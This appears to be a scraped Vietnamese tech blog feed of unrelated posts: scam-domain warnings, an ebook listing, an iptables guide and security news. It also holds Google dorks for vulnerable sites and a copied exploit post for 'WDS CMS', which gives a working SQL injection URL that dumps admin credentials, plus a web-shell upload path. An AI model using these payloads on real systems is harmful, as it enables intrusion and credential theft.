Google Dork các site được thiết kế bởi Trust.VN dính lỗ hổng HeartBleed

Google dork Description:  intext:"Thiết kế web chuyên nghiệp : Trust.vn"

Google search:  intext:"Thiết kế web chuyên nghiệp : Trust.vn"

Submited: 2015-07-XX

Type: HeartBleed BugAuthor : TungNgo Một vài hình ảnh :

Tìm Kiếm trên Google

Thêm : Reg domain miễn phí với Iban

Hoàng loạt website lừa đảo bị “bóc trần”

Hôm qua (26/8), Phòng Cảnh sát điều tra phòng chống tội phạm sử dụng công nghệ cao - PC50, Công an TP. Hà Nội đã công bố một loạt website và tài khoản trên mạng được sử dụng để lừa đảo.

Qua công tác điều tra và xác minh, PC50 đã phát hiện ra nhiều đối tượng sử dụng mạng máy tính, mạng viễn thông, mạng internet và các thiết bị số để thực hiện hành vi chiếm đoạt tài sản của người khác, vi phạm Điều 226B, Bộ luật hình sự.

Danh sách các website, tài khoản mạng chuyên lừa đảo được PC50 liệt kê ra gồm: tangthuong.com; trangnhangiai.vn; quaythuong2015.com; quaythuongvn.com; quaythuongonline.com; trianvang.com; tintrunggiai.com; tintrungthuong.com; tintucgiai.com; trianvang2015.com; nam2015.com; sukienquaythuong.com; sukientrian2015.com; tuanlocvanggarena.com; mangxahoi2015.com; tuanlocvangvn.com; hethonggarena.com; sukienvang.com; thongbaogarena.com; zalopage2015.com; pagezalo2015.com; mangzalo2015.com; zalothongbao.com; facebooktructuyen.com; thongtinfacebook.com; trangfacebook.com; chuongtrinhzalo.net; phanthuong365.vn; giaithuong365.vn; traogiaithuong.com.vn; giaithuong365.com; phanthuong365.com; nhanthuong365.com; facebookthongbao.com; hosofacebook.vn; trangketnoi.com; congdongface.com; ketnoiface.com; onlinezalo.com; nhangiaimessenger.com; nhangiaimessenger.net; nhangiaifacebook.net; trangchugarena.net; trianvangmessenger.com; hethonggiaithuong.com; hothonggiaithuong.net; sukienquockhanh.com; hackvcoin.com; hethongtraogiaitructuyen.com; hethongtraogiaitructuyen2015.com; nhansogarena.com; nhancodegarena.com; diendanmangxahoi.com; triankhachmangxahoi.com; hethonggiaithuong.net; traogiai.us; giaithuong.us; hethongmessenger.net; nhanqualienminh.com; sukienfb.com; tuanlocvangfb.com; tuanlocvang2015.com; giaithuongvang2015.com; giaithuongvangvn.com; giaithuongvangfb.com; mangxahoifb.com; congdongmangxahoi.com; diendangarena.com; sukiengarena.com; nhangiai365.com; congdonggarena.com; khuyenmaigarena.com; zalopage2014.com; page2014.com; nhanthuong24h.com; tanggiai24h.com; sukientrianqua.com; diendanfacebook.com

Thủ đoạn của các đối tượng này là tạo lập ra các website, tài khoản mạng mạo danh cá nhân, đơn vị cung cấp dịch vụ mạng xã hội như Facebook, Zalo...; sau đó, bằng “chiêu” gửi tin nhắn thông báo trúng thưởng một chương trình nào đó, như trúng thưởng xe máy SH, Liberty cùng 100 triệu đồng tiền mặt, v.v., để dụ các “con mồi” vào tròng, đóng cho chúng một phần phí nào đó rồi chiếm đoạt.

Ngoài ra, khi thực hiện theo các hướng dẫn trên website, toàn bộ thông tin cá nhân của người làm thủ tục trúng thưởng ảo sẽ bị các đối tượng lưu lại, đánh cắp, rồi chiếm đoạt để bán cho những kẻ khác.

PC50 Công an TP. Hà Nội cũng đề nghị những người bị hại trình báo, cung cấp thông tin cho cơ quan chức năng để điều tra, làm rõ qua số điện thoại: 043.9396145 hoặc 091.864.8942, hay gặp trực tiếp địa chỉ: Số 55 Lý Thường Kiệt, Hoàn Kiếm, Hà Nội.

Theo XHTT

Ebook Cafe cùng Tony

Xuyên suốt cuốn sách, các câu chuyện được kể với giọng điệu trào phúng, hài hước lại được thể hiện bằng ngôn ngữ “cư dân mạng” tạo sự gần gũi để các bạn trẻ có thể dễ dàng tiếp nhận. Mặc dù tác giả luôn khẳng định những thông tin, chi tiết trong câu chuyện là hư cấu và thậm xưng nhưng điều đó không có nghĩa làm cuốn sách bớt đi sự thú vị.

Chia sẻ về sự ra đời của cuốn sách, tác giả tâm niệm không muốn những điều anh tâm đắc và đúc kết chỉ dừng lại ở mạng xã hội. Anh hi vọng những câu chuyện của mình thông qua “Cà phê cùng Tony” có thể thổi nguồn cảm hứng tới những độc giả không có điều kiện sử dụng internet, đồng thời khuyến khích văn hóa đọc ở các bạn trẻ trong thời đại mà văn hóa nghe nhìn đang dần chiếm ưu thế.

Đơn giản và không cầu kì, đọc “Cà phê cùng Tony”, độc giả sẽ cảm thấy như đang khám phá câu chuyện của chính mình qua cách kể của một người khác. Đọc “Cà phê cùng Tony”, độc giả không thể cười lớn như khi đọc những mẩu chuyện cười, họ chỉ có thể tủm tỉm với những triết lí dí dỏm mà TnBS mang đến.

Mời bạn đón đọc.

MỤC LỤC

Tony đã “sống chứng khoán, chết vùi chứng khoán” như thế nào?. 4

Kiệt sức ở khách sạn 5 sao. 5

Trăng. 6

Chuyện ở đế quốc Mĩ ( i ngắn hay hơn y dài) 6

NÓI KHÉO 7

Những ngày xưa thân ái 8

Ở quê kì, ngày tháng năm . 10

To: Near and far readers ( tức độc giả gần xa) 10

Chuyện Tony bị đại gia xài xuể. 11

Làm gì có doanh nhân ở nước ta?. 13

Tua Gai ( nghe giống bạch tuộc và xương rồng) 15

Thơ. 16

Phỏng vấn xin việc. 17

Khác biệt Á-Âu. 19

Dự báo thời tiết 19

Ven hóa tranh lựng. 21

Hùn hạp làm ăn. 22

Chuyện Tony ở Harvard. 23

Về nước. 25

Ăn cắp quen tay, ngủ ngày quen mắt 26

SỐT VÀ ÔM 28

Hóng chuyện ở hội chợ quốc tớ. 29

Những nỗi lo riêng. 31

Phim Việt Nam 31

Văn hóa tàu điện ngầm 33

Làm răng. 34

Khoe và được nể. 35

Du hạc sinh và vấn đề chuối hóa. 36

Bài hát Thói Đời 38

Ngày xưa Tần Thị 39

Chuyện làng quê hóa đô thị 39

Chuyện cô Cao và ông hiệu trưởng. 40

Khủng hoảng và em 42

Chuyện Tony đi công tác ngoại quốc. 43

Ms Broken Rice. 44

Chairman, người ngồi trên ghế. 45

Lòng tin còn một chút 45

Búp phê với cái Hằng. 47

Chuyện cô Cao và thầy hiệu trưởng ( tiếp) 48

Đề bài: Em hãy mô tả quang cảnh phòng chờ sân bay. 50

Đói thì cho sạch . 51

Du hạc lần 1. 53

Du hạc đợt 2 ở Căm Rai 54

Đời cua, đời cáy 55

Unbreak 57

COI MẮT. 59

Many stories 65

Hot boy, hot girl và hot dog. 66

Chuyện ở Nha Mân. 69

Thương lắm, nẩu! 70

Con nuôi 71

Lời thề Hypocrates. 73

TẦM CỦA TONI 75

TINH TƯỚNG 76

.Lĩnh. 78

Weak kidney. 79

Chuyện hạc chuyện hành. 81

Chuyện hát chuyện ca. 84

Bài: hãy để lại mình một đối thủ. 86

Telesales. 88

Chuyện thơ chuyện thẩn. 90

Chuyện cái khăn lạnh. 92

Chuyện trên chuyến bay đường dài 93

"Thì ai ơi xin đừng" ! 95

Chuyện ở Davao. 97

Chuyện ăn chuyện nói ( Bài 1) 99

smartphone. 101

Chuyện ăn ( bài 4) 102

Chuyện Rủng Rỉnh. 104

Chuyện ở West Point 106

Chuyện ở West Point ( bài 2) : Nam nhi và chí tang bồng. 107

Chuyện con ngựa. 109

Chuyện bóng đèn và con ruồi 111

Chửi 113

Chuyện nàng An Thị 114

Unknown. 116

Ngày nhà giáo. 117

Chuyện trên chuyến bay đường dài 118

Tâm Tâm Thư. 123

Bệnh Parkinson. 124

ĐÔI LỜI TÂM SỰ VÀO NHỮNG NGÀY CUỐI NĂM 126

Nhân lực hãng ta – chuyện bây giờ mới kể. 128

Và em kiệt sức . 130

1 ý tưởng kinh doanh téo bẹo. 132

Rèn luyện óc tưởng tượng để trở thành người hay ho. 132

Chuyện ở Quế Lâm 135

Cái chết của Chu Du. 138

Biển rộng trời cao, con vẫy vùng . 141

Chuyện ăn chuyện nói: bài 1: nhận diện thể loại ăn nói vô duyên. 143

Chuyện ăn chuyện nói ( Bài 2) 145

Chuyện ăn chuyện nói ( bài 3)- Ăn. 147

Sữa và nước mắt 149

Bệnh Alzheimer 151

Óc tinh tế. 153

PHẾT PHẨY VÀ MA LANH. 157

Tôi ôm con sáo bé bỏng của tôi . 158

Bệnh Cocky. 161

Gà què liệu có gáy vang?. 163

Nếu thời gian có quay trở lại, . 165

Lời thề Hippocrates. 167

Điện đàm với Quỳnh Yên. 169

Bệnh Autism 170

Vừa được 1 message như sau. 172

Chuối và Tony. 173

Viết cho những hoang mang. 175

Sinh hoạt với giáo viên. 176

Chuyện cái tổng đài điện thoại 178

480 USD ++. 181

Cái chết của Chu Du. 181

Những ngày khởi nghiệp. 184

Chụy lái đò của em . 188

Link tải :http://sachvui.com/ebook/ca-phe-cung-tony-tony-buoi-sang.849.html

Hướng dẫn open port iptables trên CentOS

Nếu bạn muốn mở hoặc đóng port cho VPS thì phải chỉnh sửa file cấu hình của iptables. Mặc định thì file này có đường dẫn là /etc/sysconfig/iptables

Mở port VPS

Ví dụ để mở port xxx, bạn hãy thực hiện lệnh sau:

iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport xxx -j ACCEPT

Sau đó lưu lại cấu hình và khởi động lại iptables

service iptables save
service iptables restart

Đóng port VPS

Để đóng port bất kỳ, bạn chỉnh sửa trực tiếp file/etc/sysconfig/iptables bằng lệnh

vi /etc/sysconfig/iptables

xóa những dòng có port cần đóng.

Sau đó lưu lại cấu hình và khởi động lại iptables

service iptables restart

Kiểm tra lại port đang mở

iptables -L -n

Trượt suất thực tập tại Facebook vì tìm ra lỗ hổng Messenger

Aran Khanna, sinh viên Havard nổi tiếng với tiện ích Chrome cho phép theo dõi địa điểm bạn bè Facebook 24/7, đã trượt mất cơ hội thực tập tại mạng xã hội này.

3 tháng trước, Aran Khanna “nổi như cồn” trên mạng nhờ phát triển tiện ích Chrome cho phép bạn biết được bạn bè Facebook của mình đã ở những đâu. Đây cũng là thời điểm anh chuẩn bị bước vào khóa thực tập tại mạng xã hội lớn nhất thế giới.

Tiện ích Marauder’s Map sử dụng dữ liệu từ ứng dụng Facebook Messenger để lập bản đồ nơi người dùng gửi tin nhắn. Nó còn hiển thị địa điểm, chính xác tới từng met, trong nhóm chat với người mà anh không quen biết. Điều đó đồng nghĩa với người lạ cũng có thể nhìn thấy được bạn đang gửi tin nhắn đi từ đâu.

Marauder’s Map bộc lộ lỗ hổng quyền riêng tư mà Facebook gặp phải trong 3 năm qua: đó là ứng dụng Messenger tự động chia sẻ vị trí người dùng với bất kỳ ai họ nhắn tin. Khanna tweet về tiện ích hôm 26/5 và đăng lên diễn đàn Reddit, Medium. Tiện ích bắt đầu gây sốt và ngay lập tức lọt tầm ngắm của Facebook.

Trong vòng 3 ngày, Facebook yêu cầu Khanna vô hiệu hóa ứng dụng. Công ty còn vô hiệu hóa chức năng chia sẻ vị trí trên bản desktop để ngay cả khi tác giả làm theo đề nghị, tiện ích cũng không hoạt động được. Trước khi bị gỡ bỏ, đã có hơn 85.000 lượt tải Marauder’s Map.

Khoảng 1 tuần sau, Facebook tung bản cập nhật cho Messenger, lưu ý với nâng cấp này, người dùng có toàn quyền kiểm soát việc chia sẻ thông tin địa điểm khi nào và như thế nào. Phát ngôn viên công ty Matt Steinfeld khẳng định Facebook đã phát triển bản cập nhật thời gian dài trước khi Khanna công khai về tiện ích kể trên. “Đây không phải là thứ có thể xảy ra trong 1 tuần. Ngay cả khi chúng tôi phản ứng nhanh, chúng cũng cần đến vài tháng”.

Theo Khanna, anh viết phần mềm chỉ để cho thấy hậu quả của việc vô tình chia sẻ dữ liệu. Người dùng có quyền quyết định đây có phải hành vi xâm phạm quyền riêng tư của họ hay không. Messenger từ khi ra đời năm 2011 đã tích hợp tính năng chia sẻ nhãn địa lý tự động. Trang công nghệ Cnet nhắc đến vấn đề này năm 2012 và hướng dẫn người dùng cách tắt dịch vụ vị trí. Nhiều bản cập nhật cho Messenger đã được phát hành nhưng tính năng chia sẻ vị trí vẫn tồn tại.

Khanna dùng Messenger thường xuyên từ ngày bắt đầu học tại Harvard nhưng không nhận ra đã chia sẻ nhiều thông tin thế nào cho tới khi xem lại lịch sử tin nhắn. Sau khi đăng Marauder’s Map, Khanna cho biết quản lý tương lai của anh tại Facebook đã gọi điện và dặn không nói chuyện với báo chí. Tối hôm đó, Khanna tiếp tục nhận cuộc gọi từ người đứng đầu bộ phận chính sách công và quyền riêng tư của công ty, nhấn mạnh không nên trả lời báo chí.

Khanna làm theo và trả mọi câu hỏi của truyền thông về cho Facebook. Ngày tiếp theo, Facebook đề nghị vô hiệu hóa tiện ích. Khanna vẫn làm theo nhưng cập nhật trên Medium và phần miêu tả răng đã đóng bản đồ theo yêu cầu Facebook.

3 ngày sau đó và 2 tiếng trước khi chuẩn bị ra khỏi nhà để chuẩn bị thực tập, Khanna nhận cuộc gọi từ nhân viên Facebook thông báo công ty đã hủy bỏ đề nghị thực tập của anh vì vi phạm điều khoản sử dụng. Tuy nhiên, Khanna cho rằng dữ liệu là từ tin nhắn riêng của mình, tức là loại thông tin mà mọi người dùng Facebook đều tiếp cận được chứ không phải chỉ có nhân viên.

Tiếp đó, Khanna lại nhận email từ Giám đốc nhân sự và tuyển dụng toàn cầu, người nói với anh bài viết trên Medium không đáp ứng được tiêu chuẩn đạo đức cần có của thực tập sinh, và vấn đề không phải ở bản thân ứng dụng mà là cách anh mô tả Facebook đã thu thập, chia sẻ dữ liệu người dùng như thế nào.

Dù trượt suất thực tập tại Facebook, sau cùng Khanna cũng có mùa hè ý nghĩa. Anh chấp nhận thực tập tại một startup công nghệ tại thung lũng Silicon. Ngoài ra, trải nghiệm với Facebook cũng dạy cho anh bài học đáng nhớ.

Theo ICT News

WDS CMS - SQL Injection

# ( In The Name Of ALLAH )

# Exploit Title : WDS CMS - SQL Injection

# Google Dork : allinurl:wds_news/article.php?ID=

# Date : 2015-08-09

# Exploit Author : Ismail Marzouk

# Vendor Homepage : http://webdesignskolan.se/

# Tested on : Windows 7

 

Exploit : http://

[Target]/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cms_admin--

 

Upload Shell : http://[Target]/wds_news/admin.php?mode=list_file

 

Shell Path :  http://[Target]/wds_news/filer/shell.php

 

 

# #### #### #### #### #### #### #### #### #

# Facebook Profile : www.fb.com/ism.marzouk

# #### #### #### #### #### #### #### #### #

 

Good Luck ^__^

Virus "Hoa hồng Việt Nam" tấn công tài khoản Facebook tại Indonesia

Trong những ngày qua, người dùng Facebook tại Indonesia đã lên tiếng cảnh báo về loại virus "Vietnam Rose" (tạm dịch: Hoa hồng Việt Nam) với khả năng tấn công và chiếm quyền điều khiển.

Hình ảnh khiêu dâm chứa link virus Rose Vietnam tại Indonesia

Theo đó, virus được tạo ra với lớp vỏ ẩn dưới những bức ảnh khiêu dâm. Sau đó, chúng được đăng tải lên mạng xã hội Facebook tại Indonesia. Khi người dùng nhấp chuột vào các đường link này, virus bắt đầu thực hiện công việc tấn công vào máy tính của khổ chủ.

Tiếp đó, tài khoản Facebook của người dùng bị chiếm quyền điều khiển và tự động đăng tải các đường link đã được lập trình sẵn trên trang cá nhân của họ.

Tinh vi hơn, virus này được lập trình có thể "vượt qua" hàng rào bảo vệ mà Facebook đã lập nên, do đó nó dễ dàng dụ dỗ người dùng click vào đường link này.

Hiện con số về tài khoản bị đánh cắp vẫn chưa được thống kê rõ ràng, tuy nhiên, người dùng tại Indonesia đang thực hiện các biện pháp tạm thời để chống virus "Rose Vietnam".

Cụ thể, họ kêu gọi những người dùng ở nước này cảnh giác và không nhấp vào đường link trên để tránh phải tình trạng bị mất tài khoản cũng như lây lan virus.

Nguồn gốc của virus trên vẫn chưa được tìm thấy, do đó, nếu xuất hiện tại Việt Nam, người dùng cần chú ý và không click vào các đường dẫn lạ chứa ảnh khiêu dâm.

Theo Dantri.com.vn

Tag :virus, hoa hồng việt nam, facebook, indonesia

Hacker có thể “giết người” từ trên Internet

Hãy thử tưởng tượng bạn đi làm mới hộ chiếu hoặc bằng lái xe thì được thông báo rằng... mình đã chết? Kịch bản này hoàn toàn có thể xảy ra với những quốc gia đang quản lý dân số bằng công nghệ thông tin.

Phát biểu tại buổi thuyết trình có tên “Tôi sẽ giết bạn” trong khuôn khổ Hội nghị bảo mật thường niên Def Con diễn ra ở Las Vegas (Mỹ), chuyên gia bảo mật Chris Rock của hãng bảo mật Kustodian (Úc) đã chỉ ra kịch bản rằng một người đang sống có thể bị chuyển sang trạng thái “chết” trên giấy tờ, khi hacker có thể khai thác các lỗ hổng bảo mật trên hệ thống đăng ký khai sinh, khai tử kỹ thuật số tại một số quốc gia, trong đó có Úc.

Chris Rock cho rằng một số người có thể khai thác các lỗ hổng bảo mật để tự “giết chết” mình nhằm lấy tiền bảo hiểm nhân thọ mà họ được chi trả, hoặc có thể “giết chết” người khác trên giấy tờ nhằm mục đích trả thù hoặc gây phiền toái cho các thủ tục hành chính về sau.

Chris Rock, người có thể “giết chết” người khác từ Internet

Những “nạn nhân” này sẽ không biết rằng mình đã “chết” trên danh nghĩa cho đến khi thực hiện các thủ tục hành chính như đổi mới bằng lái xe hoặc hộ chiếu.

Bên cạnh đó, Chris Rock cho rằng các hacker cũng có thể dễ dàng tạo ra những em bé “ảo” trên hệ thống quản lý dân số trực tuyến, nhằm các mục đích xấu như nhận tiền trợ cấp cho đến khi những đứa trẻ “ảo” này đến tuổi trưởng thành. Sau 18 năm, những tin tặc có thể lợi dụng tên tuổi của những em bé “ảo” mà mình đã tạo ra trước đó cho các mục đích tội phạm.

Chris Rock cho biết mình đã hoàn toàn sốc khi phát hiện ra rằng quá trình khai tử cũng như khai sinh trên các hệ thống quản lý dân số kỹ thuật số của chính phủ Úc được thực hiện rất dễ dàng.

“Họ thậm chí còn không muốn bảo mật quá trình này”, Chris Rock cho biết. “Tôi có thể “giết chết” bất kỳ ai ở bất kỳ bang nào”.

Để khai tử một người tại Úc thông qua hệ thống quản lý dân số đòi hỏi phải có xác nhận của bác sĩ và giám đốc dịch vụ tang lễ. Trước đây quá trình này đỏi hỏi giấy xác nhận, nhưng hiện tại một số tiểu bang như Victoria, Queensland, Nam Úc đã chuyển sang hệ thống trực tuyến. Các hệ thống này không đòi hỏi đăng nhập và thông thường chỉ cần tên bác sĩ, số xác minh danh tính đã được khai báo của bác sĩ...

Vấn đề đặt ra là những thông tin chi tiết này đều có thể truy cập công khai trên trang web của Cơ quan Quy chế Sức khỏe Chuyên môn của Úc, để cho phép các bệnh nhân có thể xác nhận bác sĩ đang chăm sóc mình là hợp pháp, tuy nhiên bên cạnh đó các hacker cũng có thể khai thác các thông tin này.

Bước thứ 2 của quá trình khai tử đó là chữ ký của giám đốc dịch vụ tang lễ, bao gồm cả cách thức để xử lý thi thể, cũng có thể được hacker làm giả dễ dàng bằng cách mạo nhận danh tính của một giám đốc dịch vụ tang lễ. Hoặc đơn giản hơn, một người bất kỳ cũng có thể đăng ký để trở thành giám đốc dịch vụ tang lễ tại Úc một cách dễ dàng chỉ bằng cách điền vào một mẫu đơn nhỏ.

Để chứng minh điều này, trong quá trình nghiên cứu về vấn đề “giết người trên Internet”, Chris Rock đã làm một trang web giả về dịch vụ tang lễ, trong đó anh cũng đã nộp đơn đăng ký để trở thành giám đốc dịch vụ tang lễ và bất ngờ đơn của anh đã được phê duyệt sau vài ngày.

Chris Rock cho rằng sở dĩ chính phủ Úc muốn quá trình khai sinh, khai tử được thực hiện dễ dàng nhằm giúp quá trình khai báo được thực hiện đơn giản, tuy nhiên đây cũng là “con dao hai lưỡi” để tin tặc và những tên tội phạm mạng có thể khai thác.

Chuyên gia bảo mật này cho biết ông bắt đầu nghiên cứu về vấn đề “khai sinh, khai tử” từ một năm trước đây sau khi bệnh viện Austin tại bang Victoria đã vô tình tuyên khai báo 200 bệnh nhân đã chết. Đây là một lỗi do quá trình khai tử trực tuyến.

Hiện tại Cơ quan quản lý khai sinh, khai tử và kết hôn của bang Victoria đang nắm giữ 14 triệu hồ sơ và mỗi năm có thêm 77.000 khai sinh mới, 37.000 khai tử, 29.000 đơn đăng ký kết hôn và 11.000 giấy đăng ký đổi tên. Đây là cơ quan được Chris Rock khai thác các lỗ hổng cho nghiên cứu cũng như làm ví dụ minh họa cho bài thuyết trình của mình.

Theo Chris Rock, mặc dù đang nắm giữ các thông tin quan trọng nhưng cơ quan này lại thiếu đi sự bảo mật cần thiết. Bên cạnh đó, cho dù nếu hệ thống của một bang này được bảo mật đủ mạnh thì chỉ cần hệ thống tại một bang khác thiếu bảo mật cũng có thể bị hacker lợi dụng vì mục đích xấu.

“Đây là vấn đề toàn cầu”, Chris Rock cảnh báo, trong bối cảnh nhiều quốc gia đang áp dụng các hệ thống khai báo và khai tử trực tuyến thìáyM hacker luôn có những biện pháp để khai thác vào các hệ thống cho những mục đích khác nhau.

Theo Dantri.com.vn

Tag : hacker, internet, giết người

Google bất ngờ tái cấu trúc mạnh mẽ, thay đổi vị trí CEO

Trong một động thái bất ngờ, Google vừa thực hiện một cuộc tái cấu trúc mạnh mẽ, trong đó Google trở thành công ty con của một công ty Cổ phần mới được thành lập, với tên gọi Alphabet. Ban lãnh đạo của Google sẽ chuyển sang lãnh đạo công ty mới thành lập này.

Trong một động thái bất ngờ, Google vừa thực hiện một cuộc tái cấu trúc mạnh mẽ, trong đó Google trở thành công ty con của một công ty Cổ phần mới được thành lập, với tên gọi Alphabet. Ban lãnh đạo của Google sẽ chuyển sang lãnh đạo công ty mới thành lập này.

Hãng công nghệ hàng đầu thế giới Google vừa khiến nhiều người phải bất ngờ khi thực hiện một cuộc tái cấu trúc mạnh mẽ, trong đó Google sẽ trở thành công ty con của một công ty Cổ phần mới được thành lập có tên gọi Alphabet.

Hai nhà đồng sáng lập của Google, Larry Page, sẽ rời bỏ chiếc ghế CEO của Google để trở thành CEO của công ty Alphabet mới thành lập, trong khi đó nhà đồng sáng lập còn lại, Sergey Brin, sẽ trở thành Chủ tịch của Alphabet.

Eric Schmidt, Chủ tịch của Google sẽ được chuyển sang làm chủ tịch tại Alphabet.

Đáng chú ý, “ngôi sao đang lên” của Google - Phó chủ tịch Sundar Pichai, người đã liên tục có những sự thăng tiến trong sự nghiệp tại Google, sẽ được ngồi vào chiếc ghế CEO tại Google mà Larry Page để lại.

Google “lột xác” để trở thành một công ty con của Alphabet

Alphabet sẽ quản lý nhiều công ty con, là các bộ phận trước đây của Google, trong đó công ty con lớn nhất vẫn là Google. Bên cạnh đó là các công ty như Google X, phòng thí nghiệm phát triển các dự án “cho tương lai” của Google; Calico, với các dự án nhằm tăng tuổi thọ của con người; Youtube, dịch vụ video khổng lồ của Google...

Trang chủ của Alphabet sẽ được nằm tại địa chỉ https://abc.xyz/

Đây là động thái rất bất ngờ của Google và là sự thay đổi lớn nhất trong lịch sử của Google. Câu hỏi được nhiều người đặt ra là tại sao Google lại có quyết định như vậy?

Từ lâu, Google đã không còn là một công ty tìm kiếm như trước đây, mà Google đã trở thành một hãng công nghệ đa lĩnh vực, từ phần mềm, phần cứng, dịch vụ doanh nghiệp, dịch vụ Internet tốc độ cao đến cả phát triển ô tô (xe hơi tự lái) và thậm chí có cả tham vọng đặt chân vào lĩnh vực y tế... Khi những lĩnh vực kinh doanh này sinh lợi nhuận, Google đưa đến quyết định tách rời các bộ phận để nằm dưới sự quản lý của một công ty mới lớn hơn.

“Khi Sergey (Sergey Brin, nhà đồng sáng lập của Google) và tôi đã viết trong bức thư của các nhà sáng lập vào 11 năm trước rằng: “Google không phải là một công ty theo lệ thường. Chúng tôi không có ý định trở thành một””, Larry Page viết trên blog chính thức của Google.

“Alphabet là gì? Alpabet là một bộ sưu tập các công ty, mà lớn nhất trong đó dĩ nhiên là Google. Google mới này sẽ được rút gọn lại. Về cơ bản, chúng tôi tin rằng điều này sẽ cho phép chúng tôi quản lý quy mô hơn và có thể điều hành độc lập những vấn đề không liên quan với nhau”, Larry Page cho biết thêm.

Nhà đồng sáng lập của Google cũng đã có giải thích về tên gọi mới của công ty trong bài viết trên blog: “Chúng tôi thích cái tên Alphabet (bảng chữ cái) vì nó tập hợp các chữ cái đại diện cho ngôn ngữ, một trong những cải tiến quan trọng nhất của con người, và đó là cốt lõi trong cách thức chúng tôi chỉ mục công cụ tìm kiếm của Google”.

Sự ra đời của Alphabet theo nhiều nhà phân tích là sẽ giúp Google có được nhiều không gian để hoạt động hơn, trong đó các bộ phận quan trọng của Google trước đây sẽ hoạt động độc lập và có đội ngũ lãnh đạo riêng, dĩ nhiên vẫn dưới sự quản lý của Alphabet.

Điều này giúp các công ty này có điều kiện phát triển tốt hơn khi có quyền đưa ra những chính sách riêng phù hợp. Bản thân Google hiện nay cũng giống với Youtube trong vài năm qua, khi vẫn là một công ty trực thuộc Google, nhưng có Giám đốc điều hành riêng với các chính sách riêng biệt.

Công ty Alphabet sẽ thay thế Google trên thị trường chứng khoán, tuy nhiên công ty vẫn sẽ tiếp tục giao dịch dưới tên mã cổ phiếu GOOG và GOOGL quen thuộc. Động thái của Google đã nhận được sự phản hồi tích cực từ phía các nhà đầu tư, giúp cổ phiếu của Google tăng hơn 6% sau khi thông báo về quyết định tái cấu trúc được đưa ra.

Theo Dantri.com.vn

Hơn 40 trang giả mạo Facebook xuất hiện mỗi ngày

Trong nửa đầu năm 2015, trung bình một tháng xuất hiện tới 1.000 trang giả mạo Facebook nhằm đánh cắp mật khẩu để lừa lấy tiền và phát tán tin nhắn rác tại Việt Nam.

Các trang giả mạo mà kẻ xấu tạo ra có hình thức giống hệt trang Facebook, khác biệt duy nhất nằm trên thanh địa chỉ. Để dẫn dụ người dùng truy cập, kẻ xấu đưa ra liên kết dẫn tới trang giả mạo kèm theo lời chào mời về khuyến mãi lớn với nội dung hấp dẫn, thậm chí là thông tin mang tính dọa nạt, gây lo lắng…

Ngay khi người dùng bấm vào đường link, Facebook của họ sẽ thoát ra và yêu cầu đăng nhập lại. Do giao diện website giả mạo rất giống với Facebook, nhiều người không phát hiện ra và làm theo hướng dẫn là đã tự mình cung cấp thông tin tài khoản cho tin tặc.

Trang giả mạo có giao diện đăng nhập giống hệt Facebook nhưng có địa chỉ tên miền khác.

Ngoài ra, hình thức lừa nạp thẻ điện thoại "ông chú Viettel" cũng có thêm biến tướng mới. Bằng việc tạo các website giả mạo trang nạp thẻ để tăng lòng tin từ phía người dùng, kẻ xấu đã móc túi nhiều nạn nhân với số tiền lên tới vài triệu đồng. Trung bình mỗi tháng có 200 website giả mạo nạp thẻ như vậy được kẻ xấu dựng lên.

Các chuyên gia Bkav khuyến cáo người dùng khi nhận được các thông báo có nội dung khuyến mãi hấp dẫn, nên xác minh lại thông tin. Không nên thực hiện theo hướng dẫn trên các website chưa tin cậy.

Trong khi đó, Bộ Thông tin và Truyền thông cho biết, trong sáu tháng đầu năm các nhà mạng đã chặn gần một triệu thuê bao phát tán tin nhắn rác. Tuy nhiên, theo Bkav, số lượng tin nhắn rác được phát tán vẫn không hề giảm với 13,9 triệu tin được gửi đi mỗi ngày, cao hơn so với mức trung bình 13,5 triệu năm ngoái.

Bên cạnh đó, 30% các website ngân hàng tại Việt Nam tồn tại lỗ hổng, 2/3 trong số này ở mức độ nguy hiểm trung bình và cao. Lỗ hổng nguy hiểm nhất là SQL Injection, mở đường cho hacker tấn công trực tiếp vào dữ liệu của website. Các lỗ hổng XSS (Cross Site Scripting) và Open Redirection cũng gây nguy cơ chiếm quyền điều khiển của quản trị hoặc chuyển hướng website đến trang lừa đảo.

Sáu tháng qua, đã có 23.605 dòng virus máy tính mới xuất hiện, lây nhiễm trên 30,9 triệu lượt máy tính. Virus lây lan nhiều nhất là W32.Sality.PE,  lây nhiễm trên 2,6 triệu lượt máy tính ở Việt Nam. Ngoài ra, 2.790 website của cơ quan, doanh nghiệp tại Việt Nam đã bị hacker xâm nhập, trong đó có 34 site có đuôi .gov.vn và 122 site .edu.vn.

Máy giặt có thể “đánh cắp” tập tin trên máy tính

Trong quá khứ đã có vụ việc tin tặc tấn công vào một căn cứ quân sự ở Mỹ và lấy đi những tài liệu tối mật. Nhóm tin tặc này không cần phải có kết nối Internet để lấy dữ liệu ra khỏi hệ thống máy tính mà thay vào đó họ dùng một phần mềm chứa mã độc lây nhiễm sang một máy in văn phòng và biến nó trở thành trạm thu phát.  

Từ những thiết bị văn phòng tưởng như “vô hại” và tin tặc không bao giờ nhóm ngó đến như máy in, máy photo copy… lại khiến nhiều người bất ngờ và điều này có vẻ nhuốm màu khoa học viễn tưởng. Các nhà nghiên cứu bảo mật tại Manhattan đã phát hiện ra cách để bất kỳ thiết bị hiện đại nào như máy in, máy giặt, điều hòa không khí, các thiết bị thu phát tín hiệu vô tuyến… trở thành vật trung gian truyền dữ liệu. Các nhà nghiên cứu bảo mật đã phát hiện ra cách mà tin tặc lẻn vào lấy dữ liệu ra khỏi hệ thống máy tính mà không gặp bất cứ rào cản nào. Đây là một bước nghiên cứu đột phá, gợi mở về khả năng đánh cắp dữ liệu từ các máy tính mà không cần phải có kết nối Internet.

An ninh mạng là một ngành có tốc độ tăng trưởng nhanh chóng và đạt giá trị 77 tỷ USD. Nhiều doanh nghiệp và các tổ chức chính phủ trên thế giới đều mua sản phẩm của tổ chức an ninh mạng để trang bị hệ thống bảo vệ cho các thiết bị, hệ thống máy tính của mình. Tuy nhiên, với các thủ đoạn tinh vi và phức tạp của giới tội phạm mạng, không ai dám đảm bảo hệ thống máy tính, thiết bị văn phòng được bảo vệ an toàn tuyệt đối. Người ta chỉ còn biết bảo nhau “Hãy tránh xa tin tặc; hạn chế quyền truy cập vào thiết bị; không cho họ có cơ hội chiếm giữ cơ sở dữ liệu”…

